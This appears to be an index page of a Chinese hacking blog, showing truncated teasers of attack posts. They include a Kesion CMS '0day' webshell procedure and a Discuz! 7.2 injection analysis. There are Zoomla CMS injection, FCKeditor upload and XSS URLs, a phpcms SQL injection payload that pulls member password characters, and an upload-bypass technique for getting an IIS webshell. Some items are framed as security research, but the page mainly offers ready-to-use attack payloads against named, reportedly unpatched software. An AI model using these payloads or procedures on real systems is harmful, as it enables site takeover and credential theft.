神刀网

Packet Shaper:
Nemesis: a command line packet shaper
Packit: The Packet Toolkit - A network packet shaper.

More...

http://www.czxtaiji.net/content.php?theMenuId=4&theSubMenuId=1&theArticleId=48'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in d:\site\bin\sys\config.php on line 930

More...

1. // 参数解释   
2. // $string： 明文 或 密文   
3. // $operation：DECODE表示解密,其它表示加密   

More...

Read More...

科讯 v6.5 CMS Oday
后台：写入网站kesion目录如http://localhost
cookies：登录后抓取到的USER的COOKIS
帐号密码：注册后可以正常登录的用户名密码
验证码：登录时的验证码，抓图后填入

操作,先输入网站,先在网站注册一个正常用户,可以直接写入帐号密码,得到验证码图片后登录后上传,也可以直接用工具抓登录后的 COOKIE,直接点上传得到SHELL

More...

author:toby57    http://hi.baidu.com/toby57/team:www.wolvez.org在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中，没有对传入的参数进行检查，在GPC为off的情况下，导致注入漏洞的产生。漏洞分析：文件./manyou/sources/notice.php相关代码：i

More...

利用google完全是可以对一个站点进行信息收集和渗透的，下面我们用google对特定站点进行一次测试。
------------------------------------------------
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
site:xxxx.com
从返回的信息中，找到几个该校的几个系院的域名：
http//a1.xxxx.com
http//a2.xxxx.com

More...

近期由于服务器故障。丢失C盘数据。包括数据库。。。所以本站被迫关闭多日。。搬迁至近服务器。
数据回滚至最后一次备份1月5日。。。囧了。对不起各位了。
届时1月5日后所有帖子和用户资料消失。。。1月5日前注册的。未被清理的。用户。可以继续登录。就当大赦天下了把。。。
另外。

开放注册2天，大伙赶快去哦！

偶还是神刀

http://www.t00ls.net/

More...

请输入密码查看文章及评论. 成功输入密码后, 可以直接点击查看文章, 直到关闭浏览器.
此文章需要更高级别密码!

这是我在华夏黑客联盟转载的，静流--------华夏黑客联盟的讲师，其BLOG被Helen入侵了，Helen在其博客上改了首页

More...

北洋贱队（http://bbs.seceye.org）首发 Blog:www.dongxie.org 测试版本： Zoomla!逐浪CMS3.2 + mssql for Windows 描述： Zoomla!逐浪CMS是功能强大的网站内核与管理系统,集成内容管理OASNS项目管理采集邮件订阅等强大功能,基于c#语言.net架构 开发,是目前中国唯一同步支持MSSQL与Oracle两大数据库的高端CMS,用于快速构建高效门户网站 测试方法： ——————————————————————————– 警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ 1.注入漏洞： http://www.site.com/Search/SearchList.aspx?node=0&keyword=1%25′%20Or%20Db_NaMe()=0%20oR%20′%25′=’&type=1 2.FCKeditor上传漏洞 http://www.site.com/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.site.com%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx 3.XSS脚本跨站漏洞 http://www.site.com/prompt/correct.aspx?t= 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.zoomla.cn/

Exploit：

/ask/search_ajax.php?q=s%D5'%20or%20(select%20ascii(substring(password,1,1))%20from%20phpcms_member%20where%20username=0x706870636D73)>52%23

More...

More...

文章作者:udb311

本文是由一个上传的页面突破上传引发的，话说当时群里议论纷纷。发出XXX网站的上传地址，研究过来研究过去。没找到突破，本地修改上传提交仍然不能突破。 

就在当时，小三毛同志提出修改hidden to text利用IIS漏洞可取webshell。咱也试下这招数如何

本地构造上传 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

More...

More...

More...